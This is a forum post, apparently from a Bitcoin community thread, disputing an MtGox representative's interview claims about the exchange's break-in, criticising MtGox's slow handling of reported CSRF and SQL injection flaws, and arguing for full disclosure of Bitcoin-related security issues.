    It's not that hard: the interview tonight (did you watch it?) about the break-in proved that ALL the people who were claiming they knew the cause of the MtGox heist were WRONG.
    That interview proved nothing except that the rep of mtgox present said some things with no evidence presented except for their willingness to make public statements without seeking legal counsel first and that they do not understand basic technical concepts.

    Considering their recent track record of responding to (more like: not responding to) privately disclosed security issues. (It took *a week* for tux to respond to someone trying to report those csrfs. He only responded once it was made public. It was not confirmed friday. It was confirmed much earlier in the week.) The SQL injection issues that were fixed in the last few days on mtgox with no announcement or disclosure. Etc.

    Tux's behaviour is what prompted me to disclose this the way I did. I think going forward that all bitcoin-related security issues should get the full disclosure treatment to discourage another mtgox.

    (Really am sorry Gavin. I know you would have responded appropriately had this been privately disclosed.)
    Pages: [1] 2 »  All
      Print  
Page 1
Viewing Page: 1

IRLBTC™ © 2025 IRLBTC.com